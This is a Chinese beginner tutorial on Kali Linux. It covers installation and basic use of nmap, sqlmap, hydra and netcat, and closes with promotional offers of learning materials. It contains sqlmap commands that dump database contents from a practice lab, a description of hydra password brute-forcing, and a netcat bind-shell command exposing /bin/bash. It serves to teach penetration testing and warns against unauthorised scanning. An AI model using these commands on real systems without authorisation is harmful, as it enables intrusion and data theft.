
前言相信很多同学了解到和学习网络安全的时候都听过kali系统大家都称之为黑客最喜爱的系统那么什么是kali初学者用kali能做些什么胡子哥我将在本文中做详细的介绍一、kali linux是什么Kali Linux 是专门用于渗透测试的Linux操作系统它由BackTrack发展而来。在整合了IWHAX、WHOPPIX和Auditor这三种渗透测试专用Live Linux后,BackTrack正式改名为Kali LInux。没错kali的本质也是linux系统就好比以前的黑客经常使用一些工具久而久之的大家就共同开源了一个集成了各种黑客工具系统。至于为什么黑客都喜欢使用kali主要是在kali中工具齐全避免了在需要使用的时候发现工具需要再下载安装的麻烦二、安装下载kalikali的官网地址https://www.kali.org目前kali仍然在保持着更新目前最新的kali系统为kali purple里面继承了更多的防守方使用的工具。下载解压后用vm打开即可默认root账号密码均为kalikali。没有用过VMware的同学可以先到网上学习如何下载vm。另外新手可能会遇到虚拟机没有网络的问题新手我这里推荐配置网卡时选择直接连接等之后了解到网卡网段的知识可以再自己配置想要的网卡信息。左上角虚拟机设置网络适配器桥接模式复制物理网络连接状态三、kali常见工具介绍正如刚才所说kali里集成了大量的黑客工具和网络安全相关工具可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。1.nmapnmap被称为诸神之眼是一款非常强大的网络探测工具可以实现主机发现和端口扫描同时自身也可带漏洞扫描的脚本可以完成对主机端口的漏洞扫描nmap最基础用法nmap [目的ip]nmap 192.168.1.10 nmap [目的网段]nmap 192.168.1.0/24map也提供了大量的扫描时候可以设置的参数下面将举例常用的参数添加参数可以显示出不同的扫描结果2.sqlmapsqlmap是针对sql注入漏洞的一款自动化sql注入探测工具支持多种操作系统环境和多种数据库的漏洞探测渗透测试人员常常调侃“没有什么操作技术就是sqlmap一把梭哈屏幕显示绿了就直接下班”sqlmap的基本使用:sqlmap -u www.baidu.com大家尽量不要在未授权的情况下去对公网资产进行批量扫描小心去踩缝纫机哦下面我以sqli-lab里面的靶场为例出现图中绿色信息说明sqlmap对该参数成功注入注意我的url中在最后以GET方式输入了参数id/?id如果不给sqlmap提供参数sqlmap是无法使用的哦找到注入点后的步骤基本是确定的sqlmap -u http://192.168.0.107/sqli/Less-1/?id1 --dbs #获取当前数据库服务所开启的数据库名称 sqlmap -u http://192.168.0.107/sqli/Less-1/?id1 -D 数据库名 --tables #获取某数据库下的所有表名 sqlmap -u http://192.168.0.107/sqli/Less-1/?id1 -D 数据库名 -T 表名 --columns #获取D数据库下T表内的所有字段sqlmap -u http://192.168.0.107/sqli/Less-1/?id1 -D 数据库名 -T 表名 -C 字段名 --dump #将该字段的内容全部获取出来并存储在最后的信息中会有存储路径信息第一步获取数据库第二步获取数据库下表名第三步获取该表字段其实到表名这一步可以直接–dump获取表里所有内容所以sqlmap的使用难处在于如何找到注入点也就是找到产生sql注入的参数在例子里参数是GET方式上传的“id”参数下面提供一些sqlmap常用的参数3.hydrahydra又称九头蛇是一款非常高效的多种协议都可以使用的爆破工具对指定ip的指定服务进行爆破需要输入爆破使用的字典或者自己指定爆破使用的数据比如在已知账号为admin时爆破密码在kali中hydra有图形化和命令行两种使用方式对于新手来说图形化界面更加简易好用下面介绍图形化使用之后选择start就好了hydra会使用字典中的所有账号密码去做登陆的爆破尝试4.netcatnetcat简称nc是一款目前最常用网络工具它提供基于socket协议套接字针对TCPUDP连接的网络使用在具有nc使用权时几乎可以建立任何类型的连接通常在渗透测试中用该工具获得目的ip的shellnc简单使用方式建立连接传输信息主机1开启对6666端口的监听nc -lvp 6666参数解释主机2连接主机1的6666端口nc 192.168.0.163 6666nc常用使用获取远程主机shell1.正向连接shell主机1nc -lvp 6666 -e /bin/bash参数解释这里将主机1的/bin/bash重定向到了自己主机的6666端口主机2nc 192.168.0.163 6666大家可以思考一下为什么左边会有下面的报错呢并且在执行sudo su尝试进入root权限时必须在左侧主机输入密码才可以进入进入后才会收到来自右侧发来的密码kali并且产生报错。可以尝试了解不同终端bash/zsh/sh的区别总结本文简单介绍了kali系统只是适合对没有了解过的新手小白的一个引导以上就是今天的分享觉得有帮助记得点赞收藏以上所说到的漏洞扫描工具都整理成压缩包了朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】同时还为准备学习网络安全黑客或者正在学习整理了一套360独家内部资料包含以下内容如有需要也可文末获取①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】